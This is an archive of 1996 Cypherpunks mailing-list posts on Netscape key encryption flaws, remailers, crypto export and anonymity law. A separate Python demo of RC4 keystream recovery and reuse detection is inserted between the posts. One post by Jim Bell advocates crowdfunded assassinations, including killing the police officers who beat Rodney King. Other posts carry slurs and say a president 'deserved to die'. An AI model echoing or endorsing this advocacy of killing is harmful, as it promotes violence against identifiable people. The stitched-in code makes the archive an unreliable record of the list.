> PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
> you can recover the first 100-odd bytes of key stream with a simple XOR (the
> same stupid mistake Microsoft made with their .PWL files). This means two
> things:
>
> 1. It's very simple to write a program to perform a dictionary attack on the
> server key (it took me about half an hour using cryptlib, and another half
> hour to rip the appropriate code out of cryptlib to create a standalone
> program).
>
> 2. The recovered key stream from the encrypted server key can be used to
> decrypt any other resource encrypted with the server password, *without
> knowing the password*. This is because there's enough known plaintext
> (ASN.1 objects, object identifiers, and public key components) at the start
> of the encrypted data to recover large quantities of key stream.

Peter,

The attack you describe is indeed possible with the Netscape Commerce Server 1.x. However current Netscape products, such as Navigator, Enterprise Server, and FastTrack Server, have improved private key encryption that prevents these types of attacks.

Note that the old key handling code is of the same vintage as the random number seed code that was shown to be weak last year (from before I got here).
I recognized this particular problem quite some time ago, and fixed all of the products that were then in development.

If someone is running the old Commerce Server, and is not confident that the file system of their server machine can not be accessed by attackers, I would recommend that they upgrade to the FastTrack or Enterprise servers.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From mix at squirrel.owl.de Wed Sep 25 15:58:34 1996
From: mix at squirrel.owl.de (Squirrel Remailer)
Date: Thu, 26 Sep 1996 06:58:34 +0800
Subject: A periodic word of caution regarding Timothy C[unt] May
Message-ID: <19960925190103.5469.qmail@squirrel.owl.de>

Timothy C[unt] May proves that the Midwestern gene pool needs some chlorine in it.

From billc at true.com Wed Sep 25 16:04:40 1996
From: billc at true.com (William Clinton)
Date: Thu, 26 Sep 1996 07:04:40 +0800
Subject: your mail
Message-ID: <01BBAAF6.D1ED7EE0@billc.true.com>

Likewise, please remove info at truecom from this list.

----------
From: Andrew Kantor[SMTP:ak at mecklermedia.com]
Sent: Wednesday, September 25, 1996 2:58 PM
To: John Norseen; Craig; Robert Steele
Cc: news_from_wschwartau at infowar.com; Betty G. O'Hearn; Winn Schwartau
Subject: Re: your mail

I'm not sure what this list is or why I'm on it, but would whoever runs this thing please remove me or send removal instructions.

Thanks.

AK

------------------------------------------------------------
Andrew Kantor ak at iw.com
Senior Editor, Internet World http://www.iw.com
Otherwise, no one of consequence. http://www.kantor.com
------------------------------------------------------------
"Don't argue with the man who buys ink by the barrel."
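Added example (not part of any message in this archive), illustrating the weakness discussed in the "How to break Netscape's server key encryption" thread above: when the RC4 key is derived from the password alone, every blob encrypted under that password exposes the same keystream at the fixed PKCS #8 header, while a per-file salt with iterated derivation (PKCS #5 style) does not. The blob bodies, password and function names are constructed for illustration, the RC4 key is assumed to be the 16-byte MD5 digest of the password, and RC4 is kept in both variants only to isolate the effect of the salt.

```python
import hashlib
import os

# Bytes 4..21 of a PKCS #8 PrivateKeyInfo that holds an RSA key are fixed:
# INTEGER 0 (version, 3 bytes) followed by the 15-byte rsaEncryption
# AlgorithmIdentifier. These are the 3 + 15 bytes the thread's program checks.
KNOWN = bytes.fromhex("020100" "300d06092a864886f70d0101010500")
KNOWN_AT = 4  # after the outer SEQUENCE header 30 82 xx xx


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key schedule, then XOR the data with the keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def make_blob(body: bytes) -> bytes:
    """Constructed stand-in for a key file: real fixed header, fake body."""
    inner = KNOWN + b"\x04\x82" + len(body).to_bytes(2, "big") + body
    return b"\x30\x82" + len(inner).to_bytes(2, "big") + inner


def weak_encrypt(password: bytes, blob: bytes) -> bytes:
    """Scheme described in the thread: RC4 key = MD5(password), no salt or IV."""
    return rc4(hashlib.md5(password).digest(), blob)


def salted_encrypt(password: bytes, blob: bytes, iterations: int = 100_000):
    """PKCS #5 style: fresh random salt and iterated derivation (PBKDF2).

    Returns (salt, ciphertext); the salt is stored beside the ciphertext.
    """
    salt = os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, dklen=16)
    return salt, rc4(key, blob)


def keystream_window(ciphertext: bytes) -> bytes:
    """Keystream exposed by the fixed header: ciphertext XOR known plaintext."""
    return xor(ciphertext[KNOWN_AT:KNOWN_AT + len(KNOWN)], KNOWN)


def reuses_keystream(ct_a: bytes, ct_b: bytes) -> bool:
    """Audit check: blobs exposing the same keystream window share an RC4 key."""
    return keystream_window(ct_a) == keystream_window(ct_b)


def demo() -> dict:
    password = b"constructed-password"      # constructed sample value
    blob_a = make_blob(b"A" * 300)          # constructed key-file bodies
    blob_b = make_blob(b"B" * 300)
    weak_a = weak_encrypt(password, blob_a)
    weak_b = weak_encrypt(password, blob_b)
    _, salted_a = salted_encrypt(password, blob_a)
    _, salted_b = salted_encrypt(password, blob_b)
    return {
        "weak_reuse": reuses_keystream(weak_a, weak_b),
        "salted_reuse": reuses_keystream(salted_a, salted_b),
    }


if __name__ == "__main__":
    print(demo())
```

The same comparison can be run over a directory of stored key blobs to find files still protected by the unsalted scheme.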
From wb8foz at nrk.com Wed Sep 25 16:07:06 1996 From: wb8foz at nrk.com (David Lesher) Date: Thu, 26 Sep 1996 07:07:06 +0800 Subject: Medical Data In-Reply-To: Message-ID: <199609252016.QAA03115@nrk.com> Phil Fraering sez: > Of course, with the really big problems with this stuff, drug > interactions, there's still no system for a doctor to find out what you're > on thanks to another doctor. Which is why it's very important to always > use the same pharmacist. So the pharmacist can sell that data about you to the drug and insurance companies........ -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From probst at iro.umontreal.ca Wed Sep 25 16:19:18 1996 From: probst at iro.umontreal.ca (David K. Probst) Date: Thu, 26 Sep 1996 07:19:18 +0800 Subject: your mail Message-ID: <199609251931.PAA13139@griao.iro.umontreal.ca> Well, obviously the distribution list is the entire P-TRAK database from Lexis/Nexis. :-) David K. Probst From dlv at bwalk.dm.com Wed Sep 25 16:20:51 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 07:20:51 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! In-Reply-To: <9609251433.AB02026@cti02.citenet.net> Message-ID: "Jean-Francois Avon" writes: > Please reply by e-mail since I am not on Cypherpunks anymore. Good riddance. That's the kind of subscribers this list needs to lose, rather than the technical people. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 25 16:33:29 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 07:33:29 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! 
In-Reply-To: Message-ID: Phil Fraering writes: > It's widely believed that the New Orleans Mafia (the source of my recent > statement about body decomposition in Louisiana swamps) was a prime driver > in the assasination of the late President John F. Kennedy. > > I think it's fairly safe to say that having done this didn't do them a > damn bit of good. It didn't do anyone else a damn bit of good. JFK deserved to die. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Wed Sep 25 16:46:02 1996 From: jya at pipeline.com (John Young) Date: Thu, 26 Sep 1996 07:46:02 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <199609252037.UAA11310@pipe2.ny3.usa.pipeline.com> Nikkei English News, 24 September 1996. Mitsubishi unveils Japan's fastest encryption chip Mitsubishi Electric Corp. said it has developed an LSI that can encrypt data at a speed of 450 megabits per second, which is four times faster than any other encryption chip developed in Japan and brings domestic technology in line with DES, the U.S.-developed encryption system that has become the standard in the U.S. and Europe. Because the chip performs the same as DES, Mitsubishi will promote it as a domestic product for encryption needs in Japan, with an eye on the growing market for corporate intranets and high-speed data communications. It said it will prepare for volume production during this year. The company fabricated the chip as a gate array using a 0.5 micron CMOS process and its own proprietary encryption algorithm MISTY. Operating at a maximum input/output speed of 40 megahertz, the chip can handle 32 bits per clock cycle. [End] From pgf at acadian.net Wed Sep 25 16:51:55 1996 From: pgf at acadian.net (Phil Fraering) Date: Thu, 26 Sep 1996 07:51:55 +0800 Subject: Possible snake oil? Message-ID: I ran across this at the web site of a New Orleans area web authoring company. 
I checked with a friend of mine of long standing on this list, and he assured me that the information was probably false. (Here it is...) Well? Do _any_ of you know of a 1024-bit encryption standard for the world wide web currently in use? According to these people, they're using it. ObLegalQuestion: Should I have been less coy about the corporation name? Phil Fraering The above is the opinion of neither my internet pgf at acadian.net service provider nor my employer. 318/261-9649 From jimbell at pacifier.com Wed Sep 25 17:12:32 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 26 Sep 1996 08:12:32 +0800 Subject: SAY WHAT? [Assassination NOISE] Message-ID: <199609252034.NAA23641@mail.pacifier.com> At 12:30 AM 9/25/96 -0700, Bill Stewart wrote: >Bell, like X, is proposing mechanism without built-in policy, >as well as suggesting some potential policy implementations. If you use >the mechanism to sponsor assassination of people who have initiated force >against you, you're only using retaliatory force, not initiating it. Funny that Simon didn't see that... >On the other hand, the mechanism also can be used against people who >haven't initiated force against the sponsor - even against politicians >who have refused to get the country into misguided but popular wars >or judges who have refused to convict innocent but wrong-colored defendants. That's a too-superficial interpretation. If AP were operating, it would be unnecessary to "get the country into misguided but popular wars" because anybody who wanted to war with some external enemy need merely kill him via AP, by individual donation. There would be no legislature to make the war decision, and no need for any such decision. War as we have known it (a collective decision that is binding on all citizens, whether or not they approve) would simply not exist. There would be no mechanism to force other people into a war on your side, other than rhetorical arguments. 
Attempting to do so by force would merely make more enemies. As for "judges who have refused to convict innocent but wrong-colored defendants"? I think that's an unfair and misleading "problem." Much of the problem of bias and discrimination in this country is caused by the fact that these factors have been institutionalized BY GOVERNMENT. Trace it back just a little, and you'll discover that the "innocent but wrong-colored defendants" were arrested and charged BY GOVERNMENT in a display of bias. At best, that courageous judge is merely ceasing, in one particular incident and too late, an episode of bias which shouldn't even have been started in the first place. Is this "good"? Not really. It's just "not quite as bad." There's still the underlying problem which will repeat ad infinitum. Why depend on a judge to do this? Why not fix the bias before the defendant gets to court? I look at it this way: Why shouldn't the black community (and any outraged whites, as well...) have been able to purchase the deaths of all of the LAPD officers who beat Rodney King, INCLUDING the ones who stood around and watched it happen? I claim that in a society where they could do this, such a beating simply would never have happened, because no cop would have dared to take the risk that a camera would be nearby. In other words, the problem would have been solved before it started. The quickest response to this is that "pretty soon, you won't have any more cops." But no, that's not true. It _is_ true that the thugs will no longer want to become/stay as cops, so that'll be a loss for the good. More likely, cops will simply stop doing those things that will end up offending a substantial fraction of the population, like beating a carload illegal immigrants that they have stopped after a car chase. >Like democracy, it's a really terrible system, and like democracy, >there are some alternatives that aren't worse :-) Maybe even democracy. >It's at least as appalling an idea as government. 
> >If it does catch on, and I suspect that the technology will certainly >make it possible, I hope that most of the public will have enough sense >and decency not to pay for murdering people who don't deserve it, >so assassins will find more of a market for killing people who do, >and that the lower-paid assassins who kill undeserving people will >be less competent and get caught like most stupid bank robbers do. > >But there are enough Drug-War-Loving Americans that I doubt it. The de-facto drug war won't end instantly after the adoption of AP, but it will be pretty quick. Instead of today, when every citizen is forced through taxation to support the Drug War, this will probably drop to 25% voluntary contributions or less post AP. It's pretty hard to get enthused about a victimless crime, and likewise it's hard to enforce such rules, so people's donations won't match the pre-AP funding. Classic drug-warriors won't dare spread any of their propaganda; people's memories will still be fresh on the pre-AP abuses, so the Bennetts and the Rangels will either be silent or dead, or effusive with apology for their prior behavior. Further, the dramatic drop in the prices of currently-illegal drugs will translate into a similarly large drop in crimes to pay for those drugs, an improvement that everybody will notice. >And attila replied >> all very true. but I will defend Jim Bell's rights to propose >> them, even if Bell is more than a few cards short of a full deck. > >Sure, he's got the right to, and if I run a remailer again he's welcome >to use it to discuss AP (though not to propose assassinations....) >Doesn't mean I want to encourage this sort of thing, though. >Remailers can damn well afford to be choosy, and I'll bet >5 zorkmids that the first person to use my remailer for assassination >doesn't last a month. (Oh, wait...) "Your bet has been duly recorded, sir." 
Jim Bell jimbell at pacifier.com From raoul at sunspot.tiac.net Wed Sep 25 17:15:54 1996 From: raoul at sunspot.tiac.net (Nico Garcia) Date: Thu, 26 Sep 1996 08:15:54 +0800 Subject: LACC: ISPs' information on users In-Reply-To: Message-ID: <199609251533.LAA28373@sunspot.tiac.net> -----BEGIN PGP SIGNED MESSAGE----- Fortunately, if you take a look at USCC 18, I believe section 2701 but could be off, the police in the US need a subpoena to get that data. Not a warrant; a *subpoena*. One of the best things that came out of the Electronic Communications Privacy Act, IMHO. Nico Garcia raoul at tiac.net -----BEGIN PGP SIGNATURE----- Version: 2.6 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMklQx37Cg0E0WGE5AQGTigQAknpxlRZUTdqkXdA2alFVfghKIATkxCe9 MTZuDcma523mbClj6irSZ0EB7ttOq2gT1eC8FeIX0WlqEUu3ZeNFvkmR5uK9HxYd JdaB3/lrHLGZNvqQ4H50aD0Zlf3ufTRjknJwDTFVBv31GlqJM1458k6IULeRLuMw HrjkQPgZndQ= =rL7X -----END PGP SIGNATURE----- From aba at dcs.ex.ac.uk Wed Sep 25 17:37:13 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Thu, 26 Sep 1996 08:37:13 +0800 Subject: We removed radikal 154 from xs4all :( In-Reply-To: <199609251240.IAA14357@sherry.ny.ubs.com> Message-ID: <199609251555.QAA00118@server.test.net> pjb at ny.ubs.com writes: > Adam, you know the german government did not win this one, and i know that > they did not win, Agreed. > my point was, will they, and other governments take this as a win > and be encourgaged to press their luck with someone else. They are claiming a victory, and the net is claiming a victory. The net is correct, they are deluding themselves. They might take what they think is a victory as an encouragement to try the same thing on some other site based on another topic, I agree with your synopsis. I think more would be gained if they could be made to face up to their loss. If they tried to block all of the mirrors for instance, I think this would be marvelous, for the obvious reason that it would backfire on them heavily. 
My point was therefore to suggest methods of trying to ensure that the relevant people in german politics and the press could be made aware of their loss. I am wondering how someone in Germany could engineer the necessary contacts. By demonstrating to a journalist how it has not been stopped. Perhaps by writing to the politicians responsible for the scare listing the number and jurisdictions of sites? These are some things that I think it might be fruitful for someone in Germany to write to their polticians and journalists. If one of the Germans who have posted to keep us up to date on this topic could undertake to do this, I think they would be doing something very useful for the cause of free speech. For xs4all management to write the same people a letter saying the same might also be useful. It needs some Germans to shout loudly on this. Perhaps there are some pressure groups who are pro-censorship who could be `fed' this information, and encouraged to pressure the German politicians, to also inadvertently help out the cause of free speech. I'm trying to work up some _action_ here, any takers, German cpunks? Adam From azur at netcom.com Wed Sep 25 17:45:50 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 26 Sep 1996 08:45:50 +0800 Subject: Where to write crypto? Message-ID: >On Tue, 24 Sep 1996, Steve Schear wrote: > >> I believe Taiwan might be an excellent location to have 'clear room' crypto >> work done. Taiwan has a very large skilled software labor pool and isn't a >> member of COCOM. >Why go so far, when you can export crypto from Anguila or Canada. The >first is right next to Florida and is a tax haven, the second has a large >talent pool and the same qulity telecom as the States. The main problem is >concealing the fact that there may be any Americans involved. Both save >you the trouble of learning Chinese. I didn't mean that an U.S. citizen should relocate and develop in Taiwan. 
Why do that when almost all Taiwanese CS speak, read and write fluent english. Just develop the specs and contract for programming. There are many companies waiting to take you business . BTW, there a several U.S. companies (e.g., Typhoon Software, typhoon at typhoon.com) which can manage the development of a wide variety of software projects (including crypto code) by highly qualified personel in the former Soviet Republics. For comfort, the software can be tested in the U.S. (just to make sure no trapdoors have been insered by the Russian Mafia ;-) -- Steve From mech at eff.org Wed Sep 25 17:50:23 1996 From: mech at eff.org (Stanton McCandlish) Date: Thu, 26 Sep 1996 08:50:23 +0800 Subject: Dyson on anonymity (in WSJ article on our challenge to GA net law) Message-ID: <199609252017.NAA24875@eff.org> FYI: [...] Esther Dyson, president of high-tech publisher EDventure Holdings Inc. and chairwoman of the Electronic Frontier Foundation, a high-tech civil liberties organization that is a co-plaintiff in the lawsuit, calls the Georgia law "brain-damaged and unenforceable," and adds: "How are they going to stop people from using fake names? Anonymity shouldn't be a crime. Committing crimes should be a crime." [...] -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From mech at eff.org Wed Sep 25 17:50:29 1996 From: mech at eff.org (Stanton McCandlish) Date: Thu, 26 Sep 1996 08:50:29 +0800 Subject: EFF declaration/affidavit in support of anonymity in GA case. Message-ID: <199609252203.PAA27878@eff.org> Full text (with some scannos, but it's readable) in next message. Enough about "lies". We're not just talkin' the talk, we're walkin' the walk too. Also, we are negotiating final details on assisting Julf with a legal defense fund for anon.penet.fi's troubles. -- Stanton McCandlish


mech at eff.org

Electronic Frontier Foundation

Online Activist From deeb at x.org Wed Sep 25 18:03:48 1996 From: deeb at x.org (Stephen Humble) Date: Thu, 26 Sep 1996 09:03:48 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: <9609251720.AA20644@hydra.cde.x.org> tcmay at got.net (Timothy C. May) sez: > Could ISPs in the UlS. be compelled to report on the browsing and > net surfing habits of their customer base? Such as when the police/feds/Big Brother's Helpers come in, seize every piece of computer equipment on the site for "investigation", put it in a warehouse for 2 years so they can read everything and save whatever appeals to them in their private databases? As Steve Jackson Games found out, it can be slow and expensive to get the "evidence" back and the satisfaction of watching a judge ream BBH is no guarantee that such shenanigans will cease. I hope the ISP used strong encryption on all their disks and tapes. Sadly, I have no idea how to make sure an ISP I use does that properly or how to get an exhaustive list of what kind of records they keep. tcmay at got.net (Timothy C. May) sez: > To make this clear, I don't mean in a specific criminal case, where > the records are searchable under a warrant. I mean a blanket order > that all ISPs compile and forward records. How many pieces of thread does it take to make a blanket? Stephen From unicorn at schloss.li Wed Sep 25 18:04:17 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 09:04:17 +0800 Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature of the Cypherpunks List) ) In-Reply-To: <199609251219.OAA28483@digicash.com> Message-ID: On Wed, 25 Sep 1996 bryce at digicash.com wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > It's silly to conflate ratings of people with ratings of > people's opinions with ratings of people's ratings of etc. 
> > > Some of the people I work with have awful opinions on politics, > other people, music, movies, books, and food, but great opinions > on computer hardware, algorithms and programming languages. > > > But their ratings as people are generally very high. > > > (Insert inaccurate but amusing joke to the effect that if > someone has good taste in restaurants they are likely to have > poor taste in video cards, or some such.) > > > Check out Firefly (www.ffly.com). (Cpunk comment: they only > track your ratings by nym, no True Name required.) > > > Firefly has the "if I agreed with Bob a lot in the past on this > subject, I'll probably agree with him again" heuristic. It > appears to be a pretty ugly heuristic when applied to me. Ffly > keeps trying to suggest music which is in the same _genre_ as > music I have previously recommended, but what I am interested is > music that is similarly _good_. My tastes don't correspond well > to genres. > This is incorrect. Firefly actually looks at what you have recommended and then finds others who have recommended or favor the same songs/albums/groups and selects new groups albums or songs based on the number of people who agree with your recommendations who suggest them. i.e. if you give the eagles a 5 out of 5, and 20 others also gave the eagles high ratings, the system weeds out what other groups those 20 gave high ratings to and suggests them to you. As you confirm or deny your interest in those groups, the system narrows it down even more, using those choices to find others who seem to have similar tastes to you and suggesting albums and groups not yet in your file which have been recommended by those with tastes like yours. This trancends genres. It's quite a nice system. It also makes an important point about reputations. Using a catagory reputation scale is, as the author above describes, not very efficient. > > But this is a mere anecdotal impression. Give it a spin. 
> > > I wrote in the suggestion box that they add meta-ratings > (especially ratings on the little "movie reviews" submitted by > other FFly users). Some guy wrote back (same day!) that they > were planning on it. > > > Regards, > > Bryce > > > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2i > Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 > > iQB1AwUBMkkjQkjbHy8sKZitAQF5wAL/WgD5iPOR7RtCc5SNgLMGqKUJqHLiS7bM > XItX4p8Z1Uri5DZgAUoOCDZ7iEoP3rleDBThGq3rFG8y6I9tbFueC00TRwoft5rb > fR7pqeaDj2AzcSt4rYCi67ucsW4wQi1C > =rL1w > -----END PGP SIGNATURE----- > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From jnorseen at gelac.mar.lmco.com Wed Sep 25 18:24:57 1996 From: jnorseen at gelac.mar.lmco.com (John Norseen) Date: Thu, 26 Sep 1996 09:24:57 +0800 Subject: your mail Message-ID: robert, good to hear from you again...what else is new and exciting on your front...norseen From ichudov at algebra.com Wed Sep 25 18:24:59 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Thu, 26 Sep 1996 09:24:59 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: <19960925060114140.AAA186@IO-ONLINE.COM> Message-ID: <199609252211.RAA02676@manifold.algebra.com> > >> Soon I am going to be going overseas to Japan, and I want to take > >> my notebook with me so I can keep up with everything, however, I have > >> encrypted my hard drive and usually encrypt my mail. Is this in > >> violation of the ITAR to keep everything the same when I go over? Gentlemen, us customs does not give shit about what you take out on your diskettes. When I went to Russia recenty, I took PGP for DOS, and no one gave me any problem. IANAL - Igor. From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 25 18:28:36 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. 
Allen Smith)
Date: Thu, 26 Sep 1996 09:28:36 +0800
Subject: Uses of Computational Chaos
Message-ID: <01I9WC3IZ5VO8Y53G5@mbcl.rutgers.edu>

From: IN%"adamsc at io-online.com" "Chris Adams" 17-SEP-1996 15:12:13.73

>Supposing, too, that you know these weaknesses, would using separate algorithms
>for different portions of the number work well?

That would seem to be a possibility; admittedly, the local copy of AC has been checked out for the past year, so I haven't been able to take a look at it. I'd tend to think that if you _know_ the flaw, one could come up with a better way to deal with it than the generalized method I discussed. For instance, if the MSB of bytes coming out of a scribble window is too low in entropy, only use it XORed or whatever with a more-random bit.

-Allen

From ericm at lne.com Wed Sep 25 18:33:16 1996
From: ericm at lne.com (Eric Murray)
Date: Thu, 26 Sep 1996 09:33:16 +0800
Subject: Possible snake oil?
In-Reply-To:
Message-ID: <199609252236.PAA08577@slack.lne.com>

Phil Fraering writes:
>
>
> I ran across this at the web site of a New Orleans area web authoring
> company. I checked with a friend of mine of long standing on this list,
> and he assured me that the information was probably false.
>
> (Here it is...)
[..]
>
> SSL & SHTTP Encrypted Web Systems (using the maximum
> 1024-bit encryption keys)
[..]
> Well? Do _any_ of you know of a 1024-bit encryption standard for the world
> wide web currently in use? According to these people, they're using it.

In non-"export" SSL using RSA as the key-exchange algorithm 1024-bit RSA keys can be used. 128-bit RC4 is most commonly used as the symmetric algorithm in this case.

It's not snake oil. I'd guess that some marketing-type person found out enough about SSL to know that it uses 1024-bit RSA keys and thought that since 1024 bits is bigger than 128, they'd claim 1024 bit keys. There's nothing really wrong with that.
-- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm If you don't see the fnords, they won't eat your packets. If you do see the fnords, they will eat your packets, so you won't see them. PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From tcmay at got.net Wed Sep 25 18:34:57 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 09:34:57 +0800 Subject: ISPs' information on users Message-ID: At 2:43 PM 9/25/96, Phil Fraering wrote: >On Tue, 24 Sep 1996, Timothy C. May wrote: > >> (There's a certain new ISP with tight links to a quasi-religious group much >> in the news lately, and some have speculated that this ISP may be >> monitoring certain users....) >> >> --Tim May > >Which ISP and religious group is this? Just why do you think I was elliptical in my comments? To type three lines instead of just typing the name? Think about it. With Webcrawlers looking for names of organizations--and the Cypherpunks archives show up on such searches--and with some organizations being very quick to sue for perceived defamation.... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From ses at tipper.oit.unc.edu Wed Sep 25 18:43:36 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 26 Sep 1996 09:43:36 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] 
In-Reply-To: <3248DE04.5363@gte.net>
Message-ID:

On Wed, 25 Sep 1996, Dale Thorn wrote:
>
> I understood the intent of AP was to take powers the government is
> already exercising (unconstitutionally), and merely transfer some of
> them to the people, as it were.
>
> Isn't this true democracy (if a rather perverse kind)?

Not really- however, no matter what it is, it isn't a Libertarian scheme, as libertarian philosophy holds that those powers are the defining characteristic of government; AP doesn't abolish governments, it creates lots of little governments which don't even have to pretend to be democracies.

Simon

From tcmay at got.net Wed Sep 25 18:52:28 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 09:52:28 +0800
Subject: Where to write crypto?
Message-ID:

At 2:05 PM 9/25/96, s1113645 at tesla.cc.uottawa.ca wrote:
>Why go so far, when you can export crypto from Anguilla or Canada. The
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>first is right next to Florida and is a tax haven, the second has a large
>talent pool and the same quality telecom as the States. The main problem is
>concealing the fact that there may be any Americans involved. Both save
>you the trouble of learning Chinese.

Are you _sure_ about what you say about Canada? After all, in nearly all defense- and crypto-related matters, they are essentially the 51st State. In fact, Canada is one of the places crypto may be exported _to_ from the U.S. without any license. So, export strong crypto into Canada and then invoke the "you can export crypto from...Canada" clause? I don't think so.

As to Anguilla, I fear it's too small an island and too tightly controlled by the Ruling Families, who will take action if the boat gets rocked enough. The recent experiences with Vince essentially repudiating certain policies he had publicly announced have left his experiment with not a lot of "backbone" (no pun intended).
As Vince said, paraphrasing his comments, the government of Anguilla will take steps to stop things which cast the island in a bad light. Not much of a haven, eh?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From makof at alias.cyberpass.net Wed Sep 25 18:56:59 1996
From: makof at alias.cyberpass.net (makofi)
Date: Thu, 26 Sep 1996 09:56:59 +0800
Subject: Winsock Remailer Ver 1.3 -- Help!
Message-ID: <199609251716.KAA24266@sirius.infonex.com>

Hello!

It could receive messages but not remail. What could be the problem?

A sample of the Statistics Table is as follows:

Messages remailed    0
Messages discarded   3
Messages received   10

Other particulars are:

1) Pool set as 3 for light traffic
2) POP 3 working fine in other email applications.
3) Platform is Windows 3.1

Some Questions:

1) What should be the entries in the PGP Options dialogue box?
2) Do I have to create separate public and secret keyrings for the remailer?

Would appreciate any help.

Makofi

From mech at eff.org Wed Sep 25 19:08:29 1996
From: mech at eff.org (Stanton McCandlish)
Date: Thu, 26 Sep 1996 10:08:29 +0800
Subject: affeff.htm
Message-ID: <199609252203.PAA27883@eff.org>

EFF AFFIDAVIT

IN THE UNITED STATES DISTRICT COURT
FOR THE NORTHERN DISTRICT OF GEORGIA
ATLANTA DIVISION

AMERICAN CIVIL LIBERTIES        )
UNION OF GEORGIA, et al,        )
                                )
          Plaintiffs,           )    CIVIL ACTION
                                )
vs.                             )
                                )    FILE NO. _______
ZELL MILLER, in his official    )
capacity as Governor of the     )
State of Georgia, et al,        )
                                )
          Defendants.
                                )

DECLARATION OF SHARI STEELE

County of Charles   )
State of Maryland   )

1. My name is Shari Steele. I am employed as staff counsel for the Electronic Frontier Foundation (EFF), a nationwide, nonpartisan nonprofit civil liberties organization of approximately 3500 individual members. EFF works in the public interest to protect privacy, free expression, and access to public resources and information online, as well as to promote responsibility in new media. EFF is committed to defending civil liberties in the world of computer communications, to developing a sound legal framework for that world, and to educating government, journalists, and the general public about the legal and social issues raised by this new medium. The facts set forth in this declaration are based upon my personal knowledge and upon the business records of EFF. I submit this affidavit on behalf of EFF.

2. EFF is a nonprofit organization incorporated under the laws of California, with our principal place of business in California. EFF has members throughout the United States, including Georgia.

3. Since our inception in 1990, EFF has devoted considerable resources to educating the public about civil liberties and other legal issues as they arise in the context of online computer communications, or "cyberspace." Throughout EFF's existence, we have initiated and/or moderated several online forums, including forums on the World Wide Web, the WELL (a California-based conferencing system and Internet Service Provider), and USENET discussion groups. These forums are primarily interactive discussion groups, but EFF representatives also frequently participate in online "chat" rooms and in special online events that allow users to discuss and debate a variety of legal and constitutional issues.

4. In addition, EFF has our own computer site on the Internet, and our name (sometimes referred to as a "domain" name) is "eff.org."
EFF's public education efforts include the maintaining of extensive online resources, both on the forums we run with online service providers and on our own Internet site. These resources include articles, court cases, legal papers, news releases, newsletters, and excerpts from public discussions related to EFF's legal, legislative, educational and advocacy work. EFF also publishes web pages on the World Wide Web, which can be accessed at http://www.eff.org/.

5. EFF maintains eight online mailing lists, both for specific civil-liberties and activist activities, and for informing the public about our activities. Our primary mailing list has a subscriber base of approximately 7500 individuals, including many located in the State of Georgia.

